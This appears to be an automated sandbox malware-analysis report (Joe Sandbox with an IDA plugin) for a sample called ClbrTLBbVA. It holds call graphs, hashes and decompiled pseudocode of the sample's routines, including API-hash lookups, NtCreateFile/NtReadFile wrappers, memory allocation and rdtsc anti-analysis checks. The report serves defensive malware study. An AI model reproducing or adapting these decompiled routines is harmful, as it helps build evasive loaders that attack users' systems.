                                        • Source File: 00000000.00000002.304138077.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_c20000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:4.7%
                                        Dynamic/Decrypted Code Coverage:2.9%
                                        Signature Coverage:5.9%
                                        Total number of Nodes:561
                                        Total number of Limit Nodes:74
419fc0 30195->30361 30198 40f505 30198->29709 30199 41a010 2 API calls 30200 40f52e 30199->30200 30200->29709 30202 41af60 LdrLoadDll 30201->30202 30203 41a02c 30202->30203 30367 16e9780 LdrInitializeThunk 30203->30367 30204 40c385 30204->29715 30204->29718 30207 41af60 LdrLoadDll 30206->30207 30208 41a07c 30207->30208 30368 16e97a0 LdrInitializeThunk 30208->30368 30209 40c459 30209->29726 30212 41af60 LdrLoadDll 30211->30212 30213 419e3c 30212->30213 30369 16e9a20 LdrInitializeThunk 30213->30369 30214 40c4ac 30214->29730 30216->30178 30217->30176 30219 407ea0 4 API calls 30218->30219 30234 4087ba 30218->30234 30219->30234 30220 408a49 30220->30183 30221 408a3f 30222 408160 2 API calls 30221->30222 30222->30220 30225 419f00 2 API calls 30225->30234 30227 41a490 LdrLoadDll NtClose 30227->30234 30230 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 30230->30234 30233 419e20 2 API calls 30233->30234 30234->30220 30234->30221 30234->30225 30234->30227 30234->30230 30234->30233 30237 419d10 30234->30237 30240 4085d0 30234->30240 30252 40f5f0 LdrLoadDll NtClose 30234->30252 30253 419d90 LdrLoadDll 30234->30253 30254 419dc0 LdrLoadDll 30234->30254 30255 419e50 LdrLoadDll 30234->30255 30256 4083a0 30234->30256 30272 405f60 LdrLoadDll 30234->30272 30236->30185 30238 419d2c 30237->30238 30239 41af60 LdrLoadDll 30237->30239 30238->30234 30239->30238 30241 4085e6 30240->30241 30273 419880 30241->30273 30243 4085ff 30248 408771 30243->30248 30294 4081a0 30243->30294 30245 4086e5 30246 4083a0 11 API calls 30245->30246 30245->30248 30247 408713 30246->30247 30247->30248 30249 419f00 2 API calls 30247->30249 30248->30234 30250 408748 30249->30250 30250->30248 30251 41a500 2 API calls 30250->30251 30251->30248 30252->30234 30253->30234 30254->30234 30255->30234 30257 4083c9 30256->30257 30339 408310 30257->30339 30260 41a500 2 API calls 30261 4083dc 30260->30261 30261->30260 30262 408467 30261->30262 30263 408462 30261->30263 30347 40f670 
30261->30347 30262->30234 30264 41a490 2 API calls 30263->30264 30265 40849a 30264->30265 30265->30262 30266 419d10 LdrLoadDll 30265->30266 30267 4084ff 30266->30267 30267->30262 30351 419d50 30267->30351 30269 408563 30269->30262 30270 414a50 8 API calls 30269->30270 30271 4085b8 30270->30271 30271->30234 30272->30234 30274 41bf90 2 API calls 30273->30274 30275 419897 30274->30275 30301 409310 30275->30301 30277 4198b2 30278 4198f0 30277->30278 30279 4198d9 30277->30279 30282 41bd40 2 API calls 30278->30282 30280 41bdc0 2 API calls 30279->30280 30281 4198e6 30280->30281 30281->30243 30283 41992a 30282->30283 30284 41bd40 2 API calls 30283->30284 30285 419943 30284->30285 30291 419be4 30285->30291 30307 41bd80 30285->30307 30288 419bd0 30289 41bdc0 2 API calls 30288->30289 30290 419bda 30289->30290 30290->30243 30292 41bdc0 2 API calls 30291->30292 30293 419c39 30292->30293 30293->30243 30295 40829f 30294->30295 30297 4081b5 30294->30297 30295->30245 30296 414a50 8 API calls 30299 408222 30296->30299 30297->30295 30297->30296 30298 408249 30298->30245 30299->30298 30300 41bdc0 2 API calls 30299->30300 30300->30298 30302 409335 30301->30302 30303 40acf0 LdrLoadDll 30302->30303 30304 409368 30303->30304 30306 40938d 30304->30306 30310 40cf20 30304->30310 30306->30277 30333 41a580 30307->30333 30311 40cf4c 30310->30311 30312 41a1e0 LdrLoadDll 30311->30312 30313 40cf65 30312->30313 30314 40cf6c 30313->30314 30321 41a220 30313->30321 30314->30306 30316 40cf8f 30316->30314 30330 41a810 LdrLoadDll 30316->30330 30318 40cfa7 30319 41a490 2 API calls 30318->30319 30320 40cfca 30319->30320 30320->30306 30322 41a23c 30321->30322 30323 41af60 LdrLoadDll 30321->30323 30331 16e9710 LdrInitializeThunk 30322->30331 30323->30322 30324 41a257 30324->30316 30325 41af60 LdrLoadDll 30324->30325 30326 41a27c 30325->30326 30332 16e9910 LdrInitializeThunk 30326->30332 30327 41a29b 30327->30316 30330->30318 30331->30324 30332->30327 30334 41af60 LdrLoadDll 30333->30334 30335 41a59c 
30334->30335 30338 16e9a00 LdrInitializeThunk 30335->30338 30336 419bc9 30336->30288 30336->30291 30338->30336 30340 408328 30339->30340 30341 40acf0 LdrLoadDll 30340->30341 30342 408343 30341->30342 30343 414e50 LdrLoadDll 30342->30343 30344 408353 30343->30344 30345 40835c PostThreadMessageW 30344->30345 30346 408370 30344->30346 30345->30346 30346->30261 30348 40f683 30347->30348 30354 419e90 30348->30354 30352 419d6c 30351->30352 30353 41af60 LdrLoadDll 30351->30353 30352->30269 30353->30352 30355 419eac 30354->30355 30356 41af60 LdrLoadDll 30354->30356 30359 16e9840 LdrInitializeThunk 30355->30359 30356->30355 30357 40f6ae 30357->30261 30359->30357 30360->30192 30362 41af60 LdrLoadDll 30361->30362 30363 419fdc 30362->30363 30366 16e99a0 LdrInitializeThunk 30363->30366 30364 40f4fe 30364->30198 30364->30199 30366->30364 30367->30204 30368->30209 30369->30214 30371 16e9540 LdrInitializeThunk

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 41a40a-41a459 call 41af60 NtReadFile
                                        APIs
                                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID: 1JA$rMA$rMA
                                        • API String ID: 2738559852-782607585
                                        • Opcode ID: b5b944df2376f48e40476b4721eebe737ab7416f2b547024fba2a46ef526a597
                                        • Instruction ID: 5f0bd78bb1628179abd2b6b753afab3609fd50d40dc772f4dcf02f555042c101
                                        • Opcode Fuzzy Hash: b5b944df2376f48e40476b4721eebe737ab7416f2b547024fba2a46ef526a597
                                        • Instruction Fuzzy Hash: C0F0F4B6200108AFCB08DF89DC81EEB77A9EF8C714F158249FE1D97241D630E951CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 3 41a410-41a426 4 41a42c-41a459 NtReadFile 3->4 5 41a427 call 41af60 3->5 5->4
                                        APIs
                                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileRead
                                        • String ID: 1JA$rMA$rMA
                                        • API String ID: 2738559852-782607585
                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                        • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                        • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 244 40acf0-40ad19 call 41cc50 247 40ad1b-40ad1e 244->247 248 40ad1f-40ad2d call 41d070 244->248 251 40ad3d-40ad4e call 41b4a0 248->251 252 40ad2f-40ad3a call 41d2f0 248->252 257 40ad50-40ad64 LdrLoadDll 251->257 258 40ad67-40ad6a 251->258 252->251 257->258
                                        C-Code - Quality: 100%
                                        			E0040ACF0(void* __eflags, void* _a4, intOrPtr _a8) {
                                        				char* _v8;
                                        				struct _EXCEPTION_RECORD _v12;
                                        				struct _OBJDIR_INFORMATION _v16;
                                        				char _v536;
                                        				void* _t15;
                                        				struct _OBJDIR_INFORMATION _t17;
                                        				struct _OBJDIR_INFORMATION _t18;
                                        				void* _t30;
                                        				void* _t31;
                                        				void* _t32;
                                        
                                        				_v8 =  &_v536;
                                        				_t15 = E0041CC50( &_v12, 0x104, _a8);
                                        				_t31 = _t30 + 0xc;
                                        				if(_t15 != 0) {
                                        					_t17 = E0041D070(__eflags, _v8);
                                        					_t32 = _t31 + 4;
                                        					__eflags = _t17;
                                        					if(_t17 != 0) {
                                        						E0041D2F0( &_v12, 0);
                                        						_t32 = _t32 + 8;
                                        					}
                                        					_t18 = E0041B4A0(_v8);
                                        					_v16 = _t18;
                                        					__eflags = _t18;
                                        					if(_t18 == 0) {
                                        						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                        						return _v16;
                                        					}
                                        					return _t18;
                                        				} else {
                                        					return _t15;
                                        				}
                                        			}














                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                        • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                        • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                        • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 259 41a35a-41a3b1 call 41af60 NtCreateFile
                                        C-Code - Quality: 27%
                                        			E0041A35A(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                        				long _t23;
                                        				void* _t33;
                                        				void* _t34;
                                        				void* _t37;
                                        				void* _t38;
                                        
                                        				_t38 =  >=  ?  *((void*)(__eax + 0x54)) : _t37;
                                        				asm("cmpsd");
                                        				0x845();
                                        				_push(_t38);
                                        				_t4 = _a4 + 0xc40; // 0xc40
                                        				E0041AF60(_t33, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28, _t34);
                                        				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                        				return _t23;
                                        			}









                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 25ae6e8dc8cac7873104bc9be341a94afc566a6accba1bf871b7f778c19599fa
                                        • Instruction ID: acbc08f7017dbb4bbccb3bdccff5d418af212c641570f356a2999f0243731344
                                        • Opcode Fuzzy Hash: 25ae6e8dc8cac7873104bc9be341a94afc566a6accba1bf871b7f778c19599fa
                                        • Instruction Fuzzy Hash: 8A01F2B2200108AFCB08CF88DD80EEB33A9EF8C304F158249FA1C97241C630E851CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 263 41a360-41a376 264 41a37c-41a3b1 NtCreateFile 263->264 265 41a377 call 41af60 263->265 265->264
                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                        • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                        • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 266 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                        • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                        • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 82%
                                        			E0041A48B(void* __eax, void* __ebx, void* __edx, intOrPtr _a4, void* _a8) {
                                        				void* _v117;
                                        				long _t13;
                                        				void* _t20;
                                        				void* _t21;
                                        
                                        				asm("pushad");
                                        				_t10 = _a4;
                                        				_t4 = _t10 + 0x10; // 0x300
                                        				_t5 = _t10 + 0xc50; // 0x40a943
                                        				E0041AF60(_t20, _a4, _t5,  *_t4, 0, 0x2c, _t21);
                                        				_t13 = NtClose(_a8); // executed
                                        				return _t13;
                                        			}








                                        APIs
                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: 7712bb2b2bcc1ed50dd227d76b1e904893fe61dff779cd21372f85173e560420
                                        • Instruction ID: 556c69b9c41c8a3626ce8ab2d4fdf58d4d8dc37ab8fb110ffe89a9abc558f0b3
                                        • Opcode Fuzzy Hash: 7712bb2b2bcc1ed50dd227d76b1e904893fe61dff779cd21372f85173e560420
                                        • Instruction Fuzzy Hash: 97E08C75200114AFDB21DBB9CC85EEB7B69EF88264F1980A9B95CDB282D530E5018BA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                        • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                        • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: b9ce5452db09d7bd4f9728ce46a17c07e4e5ac2b4d4e80187de2c0126eff4a3d
                                        • Instruction ID: c4834daff69cb7b6937ba5d0318fcb37648733c219d11887f5020fa7f304e995
                                        • Opcode Fuzzy Hash: b9ce5452db09d7bd4f9728ce46a17c07e4e5ac2b4d4e80187de2c0126eff4a3d
                                        • Instruction Fuzzy Hash: 46900265211000030105A9990B05607004AA7D5391352C025F2005550CD66198617161
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 66%
                                        			E00409AB0(intOrPtr* _a4) {
                                        				intOrPtr _v8;
                                        				char _v24;
                                        				char _v284;
                                        				char _v804;
                                        				char _v840;
                                        				void* __ebx;
                                        				void* _t24;
                                        				void* _t31;
                                        				void* _t33;
                                        				void* _t34;
                                        				void* _t39;
                                        				void* _t50;
                                        				intOrPtr* _t52;
                                        				void* _t53;
                                        				void* _t54;
                                        				void* _t55;
                                        				void* _t56;
                                        
                                        				_t52 = _a4;
                                        				_t39 = 0; // executed
                                        				_t24 = E00407EA0(_t52,  &_v24); // executed
                                        				_t54 = _t53 + 8;
                                        				if(_t24 != 0) {
                                        					E004080B0( &_v24,  &_v840);
                                        					_t55 = _t54 + 8;
                                        					do {
                                        						E0041BE10( &_v284, 0x104);
                                        						E0041C480( &_v284,  &_v804);
                                        						_t56 = _t55 + 0x10;
                                        						_t50 = 0x4f;
                                        						while(1) {
                                        							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
                                        							_t56 = _t56 + 0x10;
                                        							if(_t31 != 0) {
                                        								break;
                                        							}
                                        							_t50 = _t50 + 1;
                                        							if(_t50 <= 0x62) {
                                        								continue;
                                        							} else {
                                        							}
                                        							goto L8;
                                        						}
                                        						_t9 = _t52 + 0x14; // 0xffffe045
                                        						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                        						_t39 = 1;
                                        						L8:
                                        						_t33 = E004080E0( &_v24,  &_v840);
                                        						_t55 = _t56 + 8;
                                        					} while (_t33 != 0 && _t39 == 0);
                                        					_push( &_v24);
                                        					_push(_t52); // executed
                                        					_t34 = E00408160(_t39); // executed
                                        					if(_t39 == 0) {
                                        						asm("rdtsc");
                                        						asm("rdtsc");
                                        						_v8 = _t34 - 0 + _t34;
                                        						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                        					}
                                        					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                        					_t20 = _t52 + 0x31; // 0x5608758b
                                        					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                        					return 1;
                                        				} else {
                                        					return _t24;
                                        				}
                                        			}





















                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                        • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                        • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                        • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 27%
                                        			E0041A663(void* __eax, void* __edi, void* __esi, void* __eflags, void* _a4, long _a8, void* _a12, long _a16, long _a20) {
                                        				intOrPtr _v0;
                                        				void* __ebp;
                                        				void* _t17;
                                        				void* _t19;
                                        
                                        				asm("in eax, 0xd1");
                                        				asm("cmc");
                                        				asm("sbb bl, 0x5");
                                        				_push(__edi);
                                        				asm("lahf");
                                        				asm("cld");
                                        				if(__eflags >= 0) {
                                        					 *((intOrPtr*)(__eax + 0x50)) =  *((intOrPtr*)(__eax + 0x50)) + _t19;
                                        					E0041AF60(__edi);
                                        					_t6 =  &_a12; // 0x414536
                                        					_t17 = RtlAllocateHeap( *_t6, _a16, _a20); // executed
                                        					return _t17;
                                        				} else {
                                        					__eflags = __eax;
                                        					__ebp = __esp;
                                        					_t9 = _v0 + 0xc74; // 0xc74
                                        					E0041AF60(__edi, _v0, _t9,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35, _t9) = _a8;
                                        					__esp = __esp + 0x14;
                                        					__eax = RtlFreeHeap(_a4, _a8, _a12); // executed
                                        					__ebp = __ebp;
                                        					return __eax;
                                        				}
                                        			}








                                        APIs
                                        • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateFree
                                        • String ID: 6EA
                                        • API String ID: 2488874121-1400015478
                                        • Opcode ID: f4c3275209d0971f64b36cd03effd05cc2a23248144a06253597ea3c267f3f1d
                                        • Instruction ID: bbafbadddf725682c80fc239ddc996a922e6f592a3fa0a8ee56e2feefdd9d220
                                        • Opcode Fuzzy Hash: f4c3275209d0971f64b36cd03effd05cc2a23248144a06253597ea3c267f3f1d
                                        • Instruction Fuzzy Hash: 15F0C2B81042455FDB10EF69DC818AB33A5FF85718B14890AF84D83303D234D46A8AB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 13 41a630-41a646 14 41a64c-41a661 RtlAllocateHeap 13->14 15 41a647 call 41af60 13->15 15->14
                                        APIs
                                        • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID: 6EA
                                        • API String ID: 1279760036-1400015478
                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                        • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                        • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 211 408310-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 221 40835c-40836e PostThreadMessageW 211->221 222 40838e-408392 211->222 223 408370-40838a call 40a480 221->223 224 40838d 221->224 223->224 224->222
                                        C-Code - Quality: 82%
                                        			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                                        				char _v67;
                                        				char _v68;
                                        				void* _t12;
                                        				intOrPtr* _t13;
                                        				int _t14;
                                        				long _t21;
                                        				intOrPtr* _t25;
                                        				void* _t26;
                                        				void* _t30;
                                        
                                        				_t30 = __eflags;
                                        				_v68 = 0;
                                        				E0041BE60( &_v67, 0, 0x3f);
                                        				E0041CA00( &_v68, 3);
                                        				_t12 = E0040ACF0(_t30, _a4 + 0x1c,  &_v68); // executed
                                        				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                        				_t25 = _t13;
                                        				if(_t25 != 0) {
                                        					_t21 = _a8;
                                        					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                        					_t32 = _t14;
                                        					if(_t14 == 0) {
                                        						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                        					}
                                        					return _t14;
                                        				}
                                        				return _t13;
                                        			}













                                        APIs
                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID:
                                        • API String ID: 1836367815-0
                                        • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                        • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                        • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                        • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 227 4082d4-4082d7 228 4082d1-4082d2 227->228 229 4082d9 227->229 230 4082dc-4082dd 229->230 231 40832e-40835a call 41ca00 call 40acf0 call 414e50 229->231 230->231 238 40835c-40836e PostThreadMessageW 231->238 239 40838e-408392 231->239 240 408370-40838a call 40a480 238->240 241 40838d 238->241 240->241 241->239
                                        C-Code - Quality: 65%
                                        			E004082D4(signed int __eax, void* __edi) {
                                        				void* __esi;
                                        				signed char _t4;
                                        
                                        				_t4 = __eax & 0x0000009d;
                                        				if(__edi + 1 != 0) {
                                        					return _t4;
                                        				} else {
                                        					asm("loopne 0x55");
                                        					asm("int3");
                                        					asm("ficomp word [ebx+0x3d]");
                                        					__esi = __eax;
                                        					__eax = E0041B750(__ecx);
                                        					__eax = __eax + __esi + 0x1000;
                                        					__esi = __esi;
                                        					return __eax;
                                        				}
                                        			}






                                        APIs
                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_ClbrTLBbVA.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MessagePostThread
                                        • String ID:
                                        • API String ID: 1836367815-0
